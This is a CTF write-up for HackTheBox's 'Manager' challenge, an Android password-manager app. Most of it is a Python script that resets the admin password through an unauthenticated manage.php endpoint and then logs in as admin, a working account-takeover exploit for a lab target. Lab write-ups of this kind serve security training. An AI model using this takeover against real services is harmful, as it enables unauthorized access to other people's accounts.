HackTheBox Manager Challenge
https://app.hackthebox.com/challenges/283
Description
A client asked me to perform a security assessment of this password management application. Can you help me?
Exploitation
Use jadx-gui to decompile the app and read through the code.
import requests
from urllib.parse import urljoin
import sys
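class ManagerApp:
    """Small HTTP client for the challenge's ``login.php``, ``register.php``
    and ``manage.php`` endpoints.

    All calls go through one ``requests.Session``, so any cookie the server
    sets on one request is sent back on the following ones. Every public
    method prints the raw response body and returns ``None`` when the request
    fails or the server answers with a 4xx/5xx status.
    """

    def __init__(self, base_url, timeout=10):
        """Create a client for *base_url*.

        Args:
            base_url: URL prefix the endpoint names are joined onto with
                ``urljoin``; it should end with ``/``, otherwise ``urljoin``
                replaces the last path segment with the endpoint name.
            timeout: seconds passed to every request so that an unresponsive
                server cannot block the client indefinitely. The default is
                a chosen value; the original sent requests with no timeout.
        """
        self.base_url = base_url
        self.timeout = timeout
        self.session = requests.Session()

    def _send(self, method, endpoint, ok_label, fail_label, *, as_json=False, **kwargs):
        """Send one request and report its outcome on stdout.

        Args:
            method: HTTP method handed to ``Session.request``.
            endpoint: path joined onto ``base_url``.
            ok_label: prefix printed in front of the response body.
            fail_label: prefix printed in front of the error message.
            as_json: return ``response.json()`` instead of ``response.text``.
            **kwargs: forwarded to ``Session.request`` (``data=`` or ``params=``).

        Returns:
            The response body (text or decoded JSON), or ``None`` on any
            ``requests.exceptions.RequestException``. ``raise_for_status``
            turns a 4xx/5xx answer into such an exception.
        """
        url = urljoin(self.base_url, endpoint)
        try:
            response = self.session.request(method, url, timeout=self.timeout, **kwargs)
            response.raise_for_status()
            print(f"{ok_label}: {response.text}")
            # Decoding stays inside the try, as in the per-method originals,
            # so a failure there is reported through the same except branch
            # when the installed requests raises its own RequestException for it.
            return response.json() if as_json else response.text
        except requests.exceptions.RequestException as e:
            print(f"{fail_label}: {e}")
            return None

    def login(self, username, password):
        """POST *username*/*password* to ``login.php``.

        Returns:
            The response text, or ``None`` on failure.
        """
        return self._send(
            "POST", "login.php", "Login response", "Failed to log in",
            data={"username": username, "password": password},
        )

    def register(self, username, password):
        """POST *username*/*password* to ``register.php``.

        Returns:
            The JSON-decoded response, or ``None`` on failure.
        """
        return self._send(
            "POST", "register.php", "Register response", "Failed to register",
            as_json=True,
            data={"username": username, "password": password},
        )

    def update_password(self, username, new_password):
        """POST *username* and *new_password* to ``manage.php``.

        Note that nothing in this client logs in before calling this; whether
        the server requires a session for it is up to the server.

        Returns:
            The response text, or ``None`` on failure.
        """
        return self._send(
            "POST", "manage.php", "Password update response", "Failed to update password",
            data={"username": username, "password": new_password},
        )

    def get_user_info(self, user_id):
        """GET ``manage.php?id=<user_id>``.

        Returns:
            The JSON-decoded response, or ``None`` on failure.
        """
        return self._send(
            "GET", "manage.php", "User Info", "Failed to fetch user info",
            as_json=True,
            params={"id": user_id},
        )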
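if __name__ == "__main__":
    # Exactly one positional argument: the target's host:port.
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <ip:port>")
        sys.exit(1)
    # Trailing slash required: urljoin otherwise drops the last path segment.
    base_url = f"http://{sys.argv[1]}/"
    manager = ManagerApp(base_url)
    # Set the password through manage.php, then log in with it.
    manager.update_password("admin", "admin")
    login_response = manager.login("admin", "admin")
    if login_response:
        # The previous message claimed a registration here, but this is the
        # result of login(), not register().
        print(f"Login succeeded: {login_response}")
    else:
        print("Login failed.")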
Summary
Manager: inspect the Android app, trace the validation path, and recover the flag.